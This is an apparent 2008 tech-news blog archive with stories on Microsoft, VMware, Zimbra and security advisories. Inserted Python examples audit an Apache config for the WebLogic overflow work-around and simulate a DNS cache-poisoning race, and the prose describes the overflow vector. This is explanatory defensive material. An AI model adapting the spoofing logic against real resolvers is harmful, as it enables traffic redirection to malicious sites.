Thursday, July 31, 2008

Microsoft Launches Free Collaboration Tools for Researchers

This week, during a summit of researchers in Redmond, Microsoft announced a set of free software tools for helping researchers publish, preserve and share data.

The utilities include an authoring add-in for Word 2007 for capturing document metadata; a Creative Commons add-in for Office 2007; an e-journal service for self-publishing of online-only journals; a research output repository platform; and a collaborative workspace for researchers.

"Collecting and analyzing data, authoring, publishing, and preserving information are all essential components of the everyday work of researchers -- with collaboration and search and discovery at the heart of the entire process," said Tony Hey, corporate vice president of Microsoft's External Research Division. "We're supporting that scholarly communication lifecycle with free software tools to improve interoperability with existing tools used commonly by academics and scholars to better meet their research needs."

The Article Authoring Add-in for Word 2007 lets researchers capture metadata at the authoring stage to preserve document structure and semantic information throughout the publishing process. The Creative Commons Add-in for Office 2007 allows authors to embed Creative Commons licenses directly into an Office document (Word, Excel, or PowerPoint) by linking to the Creative Commons site via a Web service.

The Microsoft e-Journal Service provides a hosted platform for self-publishing of online-only journals to facilitate the availability of conference proceedings and small and medium-size journals.

The Research Output Repository Platform helps capture and leverage semantic relationships among academic objects -- such as papers, lectures, presentations and video -- to facilitate access to these items.

In partnership with the British Library, a workspace will be hosted on Microsoft Office SharePoint Server 2007, providing researchers a way to collaborate throughout a project's lifecycle, from seeking funding to searching and collecting information, as well as managing data, papers and other research objects throughout the research process.

Microsoft partnered with researchers on the development of the tools to meet academic community needs. The company's product groups also submitted feedback on how the Microsoft technologies could optimally address the entire research process.

WebLogic Security Hole Found

A recently disclosed flaw in Oracle WebLogic Server can be exploited remotely, without any user name or password, to compromise the server.

Oracle has posted instructions on configuring the software so that it is not susceptible to attacks based on this flaw. The company will also release a patch to fix the problem.

Malicious code harnessing the flaw can "impact the availability, confidentiality or integrity of WebLogic Server applications which use the Apache Web server configured with the WebLogic plug-in for Apache," according to the Oracle advisory.

An exploit could be used to stage a denial-of-service attack on the machine, or to run attacker-supplied code on it. Versions 10.3 and earlier of Oracle WebLogic Server (formerly BEA WebLogic Server) are susceptible.

The vulnerability resides in the WebLogic plug-in module for the Apache Web server. It is a buffer overflow: an abnormally long request line overruns a fixed-size buffer in the plug-in, so a malicious user can append executable code to the end of a bogus request for a Web page and have the plug-in process it.

The work-around consists of limiting the request line that the Apache Web server will accept to 4,000 characters or fewer. This can be done either by adding the LimitRequestLine directive to the Apache configuration file, or by installing an Apache security module such as mod_security that rejects longer requests. Apache's own default ceiling is 8,190 characters, so a server that has never set the directive is not protected.
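A check for the work-around described above, as an added example that is neither Oracle's nor Apache's code: it parses an httpd.conf fragment for the LimitRequestLine directive and reports whether the effective ceiling is at or below 4,000. It assumes Apache's built-in default of 8,190 when the directive is absent and that a later occurrence of the directive overrides an earlier one; the sample configuration (module path, WebLogic host and port) is constructed for the demonstration.

```python
"""Audit an Apache httpd.conf for the request-line ceiling Oracle gave as the
CVE-2008-3257 work-around.

Added example for this page; it is not Oracle's, Apache's or the plug-in's
code.  Assumptions: the only directive that matters is LimitRequestLine, httpd
enforces 8190 bytes when it is absent, and a ceiling above 4000 leaves the
over-long request that triggers the overflow reachable.  The configuration
text below is a constructed sample, not a real server's httpd.conf.
"""
import re

APACHE_DEFAULT_LIMIT = 8190   # httpd's built-in LimitRequestLine default
RECOMMENDED_LIMIT = 4000      # ceiling from Oracle's work-around

# LimitRequestLine is a server-level directive: keyword, whitespace, one integer.
_DIRECTIVE = re.compile(r"^\s*LimitRequestLine\s+(\d+)\s*$", re.IGNORECASE)


def effective_limit(conf_text):
    """Return the request-line ceiling httpd will enforce for this config.

    Full-line comments are skipped and, as with a repeated server-level
    directive in httpd, the last occurrence wins.
    """
    limit = APACHE_DEFAULT_LIMIT
    for line in conf_text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        match = _DIRECTIVE.match(line)
        if match:
            limit = int(match.group(1))
    return limit


def is_mitigated(conf_text):
    """True when the config caps request lines at or below Oracle's figure."""
    return effective_limit(conf_text) <= RECOMMENDED_LIMIT


def request_line_allowed(request_line, limit):
    """Model httpd's check: a request line longer than the cap is answered 414."""
    return len(request_line) <= limit


# Constructed sample: a front end that forwards /weblogic to a WebLogic
# instance through the plug-in, with no request-line cap set at all.
VULNERABLE_CONF = """\
# constructed sample httpd.conf fragment (not a real server's config)
ServerRoot "/etc/httpd"
LoadModule weblogic_module modules/mod_wl_22.so
<IfModule mod_weblogic.c>
    WebLogicHost 10.0.0.5
    WebLogicPort 7001
</IfModule>
<Location /weblogic>
    SetHandler weblogic-handler
</Location>
"""

# Same front end with the work-around applied.
MITIGATED_CONF = VULNERABLE_CONF + "LimitRequestLine 4000\n"


if __name__ == "__main__":
    overlong = "GET /weblogic/" + "A" * 5000 + " HTTP/1.1"
    for name, conf in (("vulnerable", VULNERABLE_CONF), ("mitigated", MITIGATED_CONF)):
        cap = effective_limit(conf)
        print(f"{name}: LimitRequestLine={cap} mitigated={is_mitigated(conf)} "
              f"overlong request passes={request_line_allowed(overlong, cap)}")
```

Run it against your own httpd.conf text to see which ceiling is in force; the unmitigated sample reports 8190 and lets the 5,000-character request through, the mitigated one reports 4000 and rejects it. The directive only protects the Apache front end, so the check says nothing about WebLogic instances reached by another path.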

According to Oracle, code exploiting this flaw was posted on the Internet without any prior notification to the company. Because Oracle did not have time to prepare a patch, it has issued an alert outside its routine quarterly patch cycle.

Oracle rated the severity of this hole as high on the Common Vulnerability Scoring System. The flaw is tracked as CVE-2008-3257 in the National Vulnerability Database.

Microsoft Mum After Midori OS Plan Leaked

Microsoft is working on a project to develop a new operating system, code-named "Midori," but the company won't disclose the details at this time. Midori will not be based on Windows, unlike the OS code-named "Windows 7" currently in development, which will largely reuse the Vista kernel.

An SD Times article on Tuesday provided a description of the Midori project based on leaked "internal Microsoft documents." However, the first indications of the project's existence may have been publicized by Mary Jo Foley in her All About Microsoft blog.

A Microsoft spokesperson wouldn't comment on the SD Times article, but did confirm that the Midori project exists.

"We can confirm that Midori is one of many incubation projects underway at Microsoft, as such we are not talking about it at this time," the spokesperson stated in an e-mail. "Microsoft is always thinking about and exploring innovative ways for people to use technology."

An incubation project means that the project is "closer to market than most Microsoft Research projects, but not yet close enough to be available in any kind of early preview form," according to Foley in her "Microsoft 2.0" book.

Midori will be designed to avoid some of the dependency problems associated with Microsoft's older software technology. It will be "componentized," "Internet-centric" and based on a world of "connected systems," according to the SD Times article.

Foley says that the Midori project is led by Eric Rudder, Microsoft's senior vice president for technical strategy, whom Foley described as a "Gates heir-apparent." Rudder also oversees Microsoft's Singularity research project, an OS with some similarities to Midori, according to Microsoft's description of it.

For instance, Singularity focuses on a kind of componentization called "software isolated processes," or SIPs, which "provide the strong isolation guarantees of OS processes (isolated object space, separate GCs, separate runtimes) without the overhead of hardware-enforced protection domains," according to an overview on the Microsoft Research Web site.

Midori's componentization may be designed to handle the problems of bloat that have come with Windows OS evolution over time. The SD Times article describes Midori's componentization as boosting both security and performance.

"It [Midori] will have strong isolation boundaries and enforced contracts between components, to ensure that servicing one component will not cause others to fail, while keeping overhead minimal."

Midori will also support "distributed concurrency -- or cloud computing -- where application components exist in data centers," according to the SD Times article. The concurrency will be in effect "both for distributed applications and local ones," the article explains.

The concurrency concept sounds a lot like the data-handling capabilities of Microsoft's Live Mesh solution, a cloud-computing solution unveiled in April that promises to enable data connectivity and synchronization across various devices regardless of the location of that data.

The whole cloud computing concept is being heavily promoted by Microsoft, including Chief Architect Ray Ozzie. It's part of Microsoft's software plus services approach, in which software will be either installed at the customer's premises or hosted on external servers and accessed over the Internet.

Wednesday, July 30, 2008

The Mojave Experiment: A Vista Love Fest

Microsoft today announced the results of its Mojave Experiment survey, which gauged user reactions to Windows Vista in a supposed blind trial using hidden cameras. The trial polled 120 users in the San Francisco area who had an initial "unfavorable" view of Vista.

Unfavorable meant giving Vista an initial average rating before the experiment of 4.4 points out of 10 total points.

During the experiment, participants tried out a so-called "Mojave" operating system, which was really Vista without the identifying logos. After trying it out, the 120 participants gave the OS an average rating of 8.5, according to Microsoft.

Most of the Mojave Experiment participants were Windows XP users (84 percent), with some Apple OS (22 percent) and other OS users in the mix. The trial was administered by a "trained retail salesperson," according to Microsoft's Chris Flores.

The existence of the Mojave Experiment was unveiled during Microsoft's Financial Analyst Meeting on July 24. Analysts at the event saw a video presentation of the Mojave Experiment's findings, but it was blacked out for those listening online. Microsoft now provides a Mojave Experiment public site to view the survey results as part of an overall marketing presentation promoting Vista.

Microsoft has sold around 180 million Vista licenses since the operating system launched, which is "very balanced across both consumer and enterprise," said Bill Veghte, senior vice president of Microsoft's Online Services & Windows Business Group, speaking to the Financial Analyst Meeting crowd.

The Mojave Experiment addressed consumer interest in Vista. At the enterprise level, the numbers are clear. Vista adoption in the enterprise has barely edged up over the year or more of its existence. Vista adoption in the enterprise still remains in the single digits, according to a recently published Forrester Research study.

Microsoft's Flores attacked the author of that study, Thomas Mendel, for saying that Vista had been "rejected" in the enterprise. Flores said that Forrester was "schizophrenic on Windows Vista," citing a more positive study written by Forrester analyst Ben Gray.

For its part, Microsoft plans to address Vista's "bad image," often attributed to negative press accounts.

Microsoft's Corporate Vice President Brad Brooks told the partner crowd attending the company's Worldwide Partner Conference earlier this month that Microsoft planned to defend Vista against its critics. The company also plans to invest more funds into Vista marketing to combat Apple's ads, with about $300 million being the estimated budget.

The Mojave Project is not part of that new spending plan, according to veteran Microsoft watcher, Mary Jo Foley.

Microsoft's reactions may seem a little like overkill. Its Windows operating systems accounted for 91 percent of all operating systems used in 2008, down from about 93 percent in 2007, according to Net Applications' Market Share report.

The next runner up, Apple, had an OS share of almost eight percent, up from a little more than six percent in 2007, according to the report.

Small Companies Lax About Computer Security, Report Finds

Large companies are valuable targets for cyber criminals, but what about the small fry? Software security firm McAfee took a gauge of opinions, finding that some small and medium-size businesses don't seem that concerned about potential hacks. At least that's what its recent survey suggested.

The results were collected from telephone interviews of officials at small companies, which were defined as having fewer than 1,000 employees. McAfee surveyed at least 500 respondents at U.S. and Canadian firms.

The report said that 45 percent of those surveyed didn't think their enterprise environment was threatened by cybercriminals. What's more, at least 250 of the IT pros who picked up the horn and answered McAfee's survey questions believed their company didn't have the big brand name to attract hackers.

"For businesses of all sizes, viruses, hacker intrusions, spyware and spam can lead to lost or stolen data, computer downtime, decreased productivity, compliance issues, lost sales and even loss of reputation," stated Darrell Rodenbaugh, senior vice president of the mid-market segment at McAfee in a press release accompanying the report. "Just because a business is small does not mean it is immune to security threats."

The report added that 35 percent of respondents weren't even concerned about attacks, but about 34 percent said they'd been attacked at least four times in the past three years.

Defining Security
Every other week, month or quarter, the reports pile up, chronicling inside jobs, the proliferation of malware and a general apathy among many IT managers and staffers toward computer security. Critics of such reports might say that they come from vested interests that just publish alarming numbers to sell security solutions.

Not so, says Christian Phillips, head of security for the Regulus Group, a remittance and general business-process outsourcing company for several Fortune 500 companies. He added that many of these studies have demonstrated a noticeable pattern.

"Security is job one when you're defining a business strategy," Phillips said. "It's not just a reactionary tactic or something to get proactive about when there are threats, but a necessity."

When a peer company is attacked, it's an "issue." However, when your enterprise is attacked, it's a "problem," security experts say.

Threats of All Kinds
New threats emerge every day. Just last week, commercial air carriers Delta and Northwest warned customers about bogus e-mails posing as airline ticket invoices, which might contain malicious code, spyware and malware. The airlines urged potential customers and anyone getting such spam to delete the messages without opening them.

Craig Schmugar, a researcher at McAfee, confirmed the threat in the software company's blog. The e-mails are said to look like authentic correspondence from the airlines and even provide a screen that looks like a log-in interface asking for a username and password. The message typically says that the user's credit card has been charged by an amount, usually in the $400 range. There is even an attachment claiming to be the invoice for the ticket and credit card charge.

With larger DNS threats in the offing, taking control of security measures makes sense, according to Andrew Storms, director of security at San Francisco-based nCircle.

"For those of us who breathe infosec everyday, it's a no brainer to devote resources into the remediation and risk reduction strategies surrounding threats," Storms said. "And it should be a no brainer to people in IT circles everywhere and outside of IT at the executive level."

If you have a computer and it processes critical information, "secure your network, period," Storms added.

Tuesday, July 29, 2008

Microsoft Joins Apache Software Foundation

Microsoft inched closer to open source with a couple of announcements made last week at the OSCON open source conference in Portland, Ore.

The company will become a platinum sponsor of the Apache Software Foundation and is contributing a patch to help PHP code work better with Microsoft SQL Server. The news was announced on Friday by Sam Ramji, Microsoft's senior director of platform strategy.

As a platinum sponsor to the Apache Software Foundation, Microsoft will pay "administrators and other support staff so that ASF developers can focus on writing great software," Ramji said in his blog. Platinum sponsors contribute $100,000 per year, according to the Apache Software Foundation's Web site.

The announcement adds to Microsoft's efforts to collaborate with open source, especially when it enables interoperability with some open source solutions. For instance, in March, Microsoft announced cooperation with the Apache Software Foundation by contributing code to the Apache POI project, which is an effort to create Java libraries supporting Microsoft Office document formats.

Ramji listed two other Apache projects in which Microsoft has participated, in addition to Apache POI. Those projects are Apache Axis2, which provides an interface for Web services, and Jakarta, which focuses on developing open source applications for Java platforms.

Microsoft also announced last week that it will provide code to support PHP data compatibility with Microsoft SQL Server. The company is providing a patch to a PHP data access layer called ADOdb to better enable interoperability. Ramji said the effort represented Microsoft's "first code contribution to PHP community projects but will not be last."

Microsoft has previously announced collaborative efforts with Zend Technologies, a contributor to the PHP scripting language and provider of an enterprise PHP framework and solutions. In March, Microsoft certified PHP for Windows Server 2008. The two companies have also worked together to optimize PHP for Microsoft Internet Information Services (IIS).

Ramji also pointed to a "clarification" of Microsoft's open specification promise (OSP), in which Microsoft opened protocols and documentation for some of its core products to developers.

The clarification seems to have originated based on Microsoft's work with Apache POI. Under the OSP, developers have "the right to intentionally subset, have partial implementations, or defects in implementation of these specifications," according to Ramji.

Ramji pointed to a comment by Microsoft's associate general counsel for intellectual property policy on the clarification.

Microsoft's OSP has previously been criticized by the Software Freedom Law Center as incompatible with the GNU General Public License, largely on the basis of being able to create new versions of software incorporating Microsoft's code.

First Look: Zimbra Web-Based E-Mail for the Desktop

Zimbra, a Yahoo-owned company, last week released a beta of the open source Zimbra Desktop solution, which is meant to be an alternative to more traditional e-mail/groupware applications such as Microsoft Outlook.

In keeping with its Yahoo roots, Zimbra Desktop offers extensive integration with Yahoo's tools and e-mail, plus Yahoo branding throughout the user interface. The program itself has a very Web-like interface, with clean organization and a convenient tabbed toolbar at the top. The toolbar offers features such as e-mail, contacts, calendar, a to-do list, briefcase and documents.

I have a Google Mail account, so I was eager to see how well it integrated with Zimbra Desktop. After providing the login information for my account and configuring it to work with IMAP, I was pleased to see that Zimbra Desktop loaded my e-mail in-box properly. However, Zimbra Desktop does not provide access to Google Talk, which uses a standard Jabber protocol supported by many third-party chat applications. Moreover, the program did not automatically import my rather lengthy Gmail contact list. However, there's a workaround, as contacts may be imported from CSV files.

Zimbra Desktop is fairly configurable. It allows the user to define signatures, default font options for messages and provides the ability to display e-mail as HTML.

Users can filter spam in Zimbra Desktop by defining actions based on keywords, such as deleting messages containing certain words. However, I was disappointed to see that there was no way to integrate more powerful Bayesian filters, such as the popular open source SpamAssassin tool -- something needed in today's spam-plagued world.

Zimbra efficiently uses the desktop space. For instance, the main window of the program can be closed completely and the program will still keep a daemon running in the background, thereby freeing up precious taskbar space. This daemon is also able to pop up a notification message when new mail arrives.

Zimbra Desktop is built on the Mozilla Prism platform, which allows Web applications to be packaged in an executable wrapper powered by Firefox. This frees Web applications from the standard browser interface to make them truly stand-alone apps.

The memory usage of Zimbra Desktop (prism.exe) averaged 40 MB during my test, which is fully acceptable for modern applications on today's powerful desktop systems. I noticed that it took seven to nine seconds for Zimbra Desktop to fully start up (without the daemon running) and load my in-box. In contrast, Gmail's Web interface took about half as long (three to five seconds) on several tests. While the slightly slower speed is not a serious problem, it would help if the program's speed could be increased, since there is also some delay when switching between tabs in the interface.

If this speed issue can be resolved and a few more features added, the program will be very promising in the final release. The beta is available for Linux, Mac and Windows.

Analysis: Behind Microsoft's DATAllegro Acquisition

You've already snapped up Microsoft-branded mice, keyboards and gaming consoles. Is a Microsoft data warehouse (DW) appliance in your future?

That's just one question triggered by Microsoft Corp.'s acquisition on Thursday of DW appliance stalwart DATAllegro Corp.

Just why Redmond grabbed DATAllegro is a matter of some debate. DATAllegro, like DW appliance pioneer Netezza Inc., was among the first wave of vendors to champion the turnkey DW appliance model. In addition, DATAllegro was arguably the first appliance player to shift production to all-commodity hardware from OEMs such as Dell Computer Corp., Cisco Systems Inc. and EMC Corp. (Rival Netezza still uses "commodity" PowerPC chips in its appliance architecture.)

Since then, a raft of players -- InfoBright Corp., ParAccel Inc. and Vertica Inc., among start-ups; Hewlett-Packard Co., IBM Corp., Oracle Corp. and Sybase Inc. among established vendors -- have also taken the DW appliance plunge.

Perhaps the driver was that DATAllegro gives Microsoft a symmetrical counter to relational database rivals IBM and Oracle on the DW appliance tip. After all, Big Blue has been shipping its DB2-based Balanced Warehouses (nee, Balanced Configuration Units) for four years now, while Oracle -- after years of informally marketing "reference" warehouse configurations that it developed in tandem with hardware partners such as HP and Sun Microsystems Inc. -- announced its first explicit DW appliance program, the Oracle Optimized Warehouse, last September. Perhaps the Redmond giant perceived a DW appliance gap: It could counter IBM's and Oracle's efforts in the data warehousing low-end (the sub- or single-TB range) but was running out of gas in the DW high-end.

DATAllegro CEO Stuart Frost, for his part, said that's precisely it. "[DATAllegro] is fundamentally a high-end play. It's fairly common knowledge that Microsoft's share of the market above 10 TB is much smaller than their share below that level," he said, stressing that "SQL Server has certainly improved greatly since SQL Server 2000, and SQL Server 2008 is a great SMP product. But that's all it is: SMP. Clearly we take [SMP] in a whole new dimension of scale-out."

Frost noted the companies' history of partnership: Redmond first approached DATAllegro with the suggestion that the two companies join forces to deliver an accelerated version of SQL Server. In the midst of that, Frost said, Microsoft and DATAllegro shifted gears, talking up a plan to develop reference architectures -- just as Oracle did with its OOW push -- for SQL Server in certain hardware configurations. Buy-out talks followed, he noted.

"Reference architectures are the way major vendors have co-opted the appliance story. A big part of why [Microsoft] bought us is that we have the expertise and the ability to take that [reference architecture] to a whole new level and leapfrog Oracle in [terms of] getting that reference architecture right," Frost said.

Were scalability and reference architectures the prime drivers? No one knows for sure -- but analysts are speculating. Consider veteran data warehouse architect Mark Madsen, a principal with consultancy Third Nature Inc. and author of several data warehousing books, who thinks the DATAllegro deal does, in fact, boil down to an issue of high-end scalability. DATAllegro, with its homegrown DW technology, had it. Microsoft, with its credible -- but, compared to offerings from Oracle and IBM, immature -- SQL Server database, didn't.

"It's the missing high-end scalability for SQL Server. [Microsoft] had nothing to compete with Oracle or IBM. Now they do," Madsen said. He also noted that Microsoft should have the goods to compete with Oracle and IBM "in three years, when the next rev of SQL Server comes out."

The good news, from Microsoft's perspective, is that DATAllegro -- unlike competitor Netezza, for example -- isn't tied to any specific hardware platform. It does depend on some special driver configurations, Madsen conceded, but not extensively. Furthermore, driver dependencies probably aren't anything that would prevent Microsoft from pushing its SQL Server-derived DATAllegro technology on to any of its existing partner platforms.

As for Madsen's timetable, Frost is far more sanguine. "It's not going to take years, as some people in the blogosphere are predicting," he said. "Just from [the integration work] we've already done, we've actually found that it's going to be pretty straightforward. All of the hooks are there already [such as] the APIs. We don't have to change a line of code in SQL Server."

He continued, "Yes, we'll have to change some of our query optimizations to make it run better with SQL Server. In most cases, however, it's that much easier [than working with Ingres]. SQL Server is just that much more sophisticated, [so things such as] join capabilities, I/O -- basically all of those things that we used to have to work around in Ingres -- we can just pass a lot of that through to SQL Server without optimizing it."

The more vexing question involves DATAllegro's software special sauce, which is based on Ingres and Linux, two technologies that are largely unpalatable -- if not anathema -- to Microsoft. "DATAllegro's code is on Ingres and Linux, but as I understand...[it], it's more layered on top than hooked deep inside like [rival appliance architectures such as] Greenplum or Netezza," Madsen said. "It certainly doesn't run on Windows or C#/.NET or on SQL Server."

That's true, too, Frost conceded, but DATAllegro is really more of an architectural vision that doesn't depend on any particular technology prescription. For this reason, he argued, the move from Ingres and Linux to SQL Server and Windows -- while far from trivial -- shouldn't be a showstopper.

"We took some decisions very early on, knowing that in such a large market dominated by an incumbent, [that our] most likely exit was going to be [by way of] an acquisition. So, for example, all of the communication between our end nodes [which take in data] is through standard SQL, so pretty much any database will speak the ANSI SQL that we use at that level. We do have some mechanisms to do sideways movements of data, but we've found that SQL Server with its APIs will allow us to port over pretty easily what we already have," he said.

Why Now?
As for the timing of the acquisition, Madsen, like other industry watchers, is flat-out flummoxed.

For one thing, he pointed out, DATAllegro recently closed the books on another round of venture capital (VC) funding, which likely boosted the price that Redmond had to pay for it. He stressed that the DW appliance segment is teeming. It's flush with vendors, ideas and -- to a degree -- with VC seed money.

That's bound to change: The market itself will contract, a natural culling will occur and VC funds will flow to vendors that have the best shot at making it. Why didn't Microsoft wait for this to happen, Madsen wondered. Why did it overpay now for what it possibly could have had -- six months from now, a year from now or 18 months out -- at a cheaper price? Madsen, like several other industry watchers with whom we spoke, doesn't know. "It's very not-Microsoft, so I don't get that part of it," he confessed.

There's another wrinkle here, too: Is a Microsoft-branded DW appliance in the works? Microsoft's past forays into hardware have been niche-y and limited -- largely to avoid upsetting its Wintel OEMs. The company has had considerable success with Microsoft-branded mice, keyboards and other accessories, for example. Does it have any real interest in marketing full-blown DW appliances, or is it just acquiring DATAllegro for its technology? Does it, in fact, plan to stop selling DATAllegro- or Microsoft-branded DW hardware?

Frost, with the obvious disclaimer that he isn't yet speaking for Microsoft, said yes. He explained that the DATAllegro buy signals a shift away from fixed-configuration appliances to reference architectures (similar to what Oracle is doing with its OOW initiative) -- a data warehouse vendor works with many hardware partners to build, test, optimize and certify its offerings in specific hardware configurations. To a degree, he suggested, that's where the appliance market itself is heading: Not just Oracle, but Sybase -- with its IBM System p-powered Analytic Appliance -- is another example in kind.

"The answer, really, is yes. It's pretty obvious, frankly. It makes a great deal of sense. Microsoft is not in the business of selling big iron. This is a lot of hardware, so why not partner with the existing vendors to deliver it?" he said.

Sunday, July 27, 2008

Microsoft's DNS Fix Leads to More Problems

The blogosphere is awash with talk about the possible overall weakness of the Domain Name System (DNS) architecture. For its part, Microsoft released a DNS fix in its patch slate for July, but Redmond seems to have problems just getting it to end users. Moreover, some users of the DNS fix have experienced additional difficulties.

So far, since Microsoft's DNS fix was issued on July 10, there have been two separate problems associated with its installation.

The software giant disclosed last week, in a technical posting on its SBS services blog, that some users saw services, including Exchange Server components, fail on various Windows operating systems after installing the fix.

"Some customers have reported seeing random problems with services after installing MS08-037," the blog stated. MS08-037 is Microsoft's fix for DNS cache poisoning: it randomizes the UDP source port of outgoing queries, so an attacker forging responses must guess the port as well as the 16-bit transaction ID. Without it, attackers have a far better chance of redirecting an unsuspecting user to a malicious Web site.
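What the fix changes for an attacker, as an added example that is not part of the original post and does not reproduce Microsoft's patch: a toy model of the spoofing race, in which the resolver caches a reply only if its name, transaction ID and destination port all match the outstanding query. Before the fix the attacker knows the source port and has to guess only the transaction ID; after it, the port is drawn from the 16,384-port dynamic range too. The fixed pre-fix port of 53, the port range, the guess budget and the RNG seed are assumptions made for the demonstration, not values from the article or the patch.

```python
"""Toy model of the DNS spoofing race that MS08-037 makes harder.

Added example for this page; it is not Microsoft's code and does not
reproduce the patch.  The model: a resolver sends a query carrying a 16-bit
transaction ID from some UDP source port and accepts a reply only if the
name, transaction ID and destination port all match the outstanding query.
An off-path attacker never sees the query, so every forged reply is a guess.
Before the fix the source port is assumed fixed and known (53 here); after
it the port is drawn from the 16,384-port dynamic range.  Port range, guess
budget and RNG seed are constructed for the demonstration.
"""
import random

TXID_SPACE = 1 << 16                      # DNS transaction ID is 16 bits
DYNAMIC_PORTS = range(49152, 65536)       # IANA dynamic/ephemeral range
FIXED_PORT = 53                           # assumed predictable pre-fix port


class Resolver:
    def __init__(self, rng, randomize_port):
        self.rng = rng
        self.randomize_port = randomize_port
        self.pending = None

    def send_query(self, qname):
        """Emit a query; the tuple is what the attacker would need to know."""
        txid = self.rng.randrange(TXID_SPACE)
        port = self.rng.choice(DYNAMIC_PORTS) if self.randomize_port else FIXED_PORT
        self.pending = (qname, txid, port)
        return self.pending

    def accept(self, qname, txid, dst_port):
        """A reply is cached only if every field matches the outstanding query."""
        return self.pending is not None and self.pending == (qname, txid, dst_port)


def make_resolver(randomize_port, seed=0):
    """Resolver with a seeded RNG so runs are reproducible."""
    return Resolver(random.Random(seed), randomize_port)


def guess_space(randomize_port):
    """Number of (txid, port) combinations a blind attacker must cover."""
    return TXID_SPACE * (len(DYNAMIC_PORTS) if randomize_port else 1)


def expected_poison_rate(randomize_port, budget):
    """Analytic chance that `budget` random guesses hit the live query."""
    return 1.0 - (1.0 - 1.0 / guess_space(randomize_port)) ** budget


def spoof_once(rng, resolver, qname, budget):
    """Attacker floods `budget` forged replies; True if one is accepted."""
    resolver.send_query(qname)
    for _ in range(budget):
        txid = rng.randrange(TXID_SPACE)
        port = rng.choice(DYNAMIC_PORTS) if resolver.randomize_port else FIXED_PORT
        if resolver.accept(qname, txid, port):
            return True
    return False


def observed_poison_rate(randomize_port, trials=100, budget=5000, seed=1):
    """Fraction of independent queries the attacker manages to poison."""
    resolver = make_resolver(randomize_port, seed)
    rng = resolver.rng   # attacker shares the seeded RNG for reproducibility
    wins = sum(spoof_once(rng, resolver, "www.example.com", budget) for _ in range(trials))
    return wins / trials


if __name__ == "__main__":
    for randomized in (False, True):
        print(f"randomized source port={randomized}: "
              f"expected={expected_poison_rate(randomized, 5000):.6f} "
              f"observed={observed_poison_rate(randomized):.2f}")
```

With the port fixed, 5,000 forged replies poison a few percent of queries; with the port randomized the same flood poisons none in the sample, because the guess space grows by a factor of 16,384. The caveat practitioners should keep in mind is that a NAT device in front of the resolver that rewrites outgoing source ports to a predictable sequence gives that entropy straight back to the attacker.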

The blog indicated that notifications for ActiveSync -- Microsoft's solution for synchronizing a mobile device with either a PC or server hardware running Exchange -- were failing. Also, Internet Protocol Security (IPsec) services and Internet Authentication Services (IAS) were failing to start.

Reached early Tuesday for comment, Microsoft would only confirm that this issue is separate from another glitch announced on July 10 -- an interoperability snafu associated with the ZoneAlarm security application made by Check Point Software Technologies. In response to the glitch, Check Point provided updates for all of its ZoneAlarm products.

Tyler Reguly, a security engineer for San Francisco-based nCircle, commented that Microsoft should be more transparent about issues like those outlined in the SBS services blog. Such descriptions went relatively under the radar, and could be considered highly technical, bordering on vague.

"It may take users quite a while to diagnose the problem and then they have to find this specific blog post," he said. "Microsoft should really be doing more to make people aware of the issue. The impact isn't as great as the recent WSUS issue, but this should be handled in the same way that was. It should be given its own KB number and a security advisory should be released, especially given that IPsec is potentially affected."

Apple posts Apple TV 2.1, iPhone Web Config updates
Apple fixes Safari ‘carpet bomb’ bug
Windows DNS Patch Strands ZoneAlarm Users

VMware To Give Away Hypervisor

VMware has launched its first counter-attack to Microsoft's pricing structure for its virtualization products, announcing that ESXi, its lightweight hypervisor, is going to be given away for free.

The announcement came from new president and CEO Paul Maritz, who took the reins from dismissed co-founder Diane Greene on July 8. Maritz made the remarks during VMware's second quarter earnings call on Tuesday afternoon.

VMware CFO Mark Peek delivered the bulk of the bad news, stating that VMware will make substantially less money than expected this year. The company originally expected a year-over-year growth rate of 50 percent; that number was revised down sharply, to between 42 and 45 percent.

Peek chalked most of that poor performance up to a tanking of revenue generated by enterprise licensing agreements (ELA). He said that many customers are "forgoing discounts [gained through ELAs] to meet shorter-term needs." He also said that Microsoft's entry into the enterprise virtualization market is likely having an effect, as potential customers are slowing down their rush to buy VMware products, and considering Microsoft's new offerings, like the free Hyper-V.

Maritz gave a brief nod to Greene's leadership of the company, then launched into his take on where VMware is headed. He said it's in its "third stage" of growth. The first was the introduction of the hypervisor. The second was the introduction of virtual infrastructure products and expansion of their use in business.

"Stage three", Maritz continued, "is about dramatically extending the virtual infrastructure and products for more uses and to more users."

One way to do that is to give away the hypervisor, which other vendors already do. Currently, ESXi costs about $500, and ESX, the primary hypervisor, is substantially more than that, depending on the configuration. ESXi's small size (32MB) makes it embeddable, and VMware has a number of deals in place with OEMs like Dell, HP, IBM and others to ship it on servers. Starting July 28, ESXi will cost nothing.

The other way to increase profits is to cut costs. To that end, Maritz said a hiring freeze will go into effect, "except for strategic positions." He didn't elaborate on those statements, or mention if layoffs might be coming.

Senior Director of Product Marketing Bogomil Balkansky said that the price for ESX will not be reduced, but that it shouldn't matter to customers, because ESXi is the future. "We've made it clear that our future architectural direction is ESXi," Balkansky said, adding that both products are "completely functionally equivalent." The price of VI, VMware's suite of infrastructure products, will not change, he said.

Balkansky denied that making ESXi free was a direct response to Microsoft. "There's an inclination to interpret it that way, but I think this is a very logical move for us, given that we have a tried and true record" of making products free after a time. For instance, GSX Server (renamed VMware Server) was made free in 2006. "The timing has more to do with product release schedules and priorities, rather than what a competitor may be doing," he said.

Still, Balkansky added, there is "no question that making it free gives us an advantage and levels the playing field."

Maritz also mentioned several other new areas in which VMware will be aggressive, including extending its reach more strongly into the Asia Pacific region, and becoming more active in "the cloud", which means accessing resources over the Internet. That, perhaps, isn't surprising, since Maritz' former company, Pi Computing, was cloud-focused. Pi was bought by EMC last February. VMware, Maritz said, will "have a lot of relevance in the cloud, and as an on-ramp into the clouds."

Greene Out at VMware
Most returned products work fine, study says
Hyper-V Made Available
Yahoo: Burn your DRMed tracks to CD now

Saturday, July 26, 2008

DNS Problem Is 'Important' To Patch, Microsoft Says

Microsoft issued a formal security advisory on Friday addressing what IT security pros are calling an "urgent warning" to patch a general Domain Name System (DNS) vulnerability that can enable spoofing attacks. Redmond recommends installing a previously released "important" DNS patch as soon as possible.

The advisory comes almost immediately after H.D. Moore, a hacker and researcher who created the Metasploit vulnerability testing framework, published the attack code in two parts on Wednesday and late Thursday. The code was posted at several security mailing lists and at the Computer Academic Underground Web site.

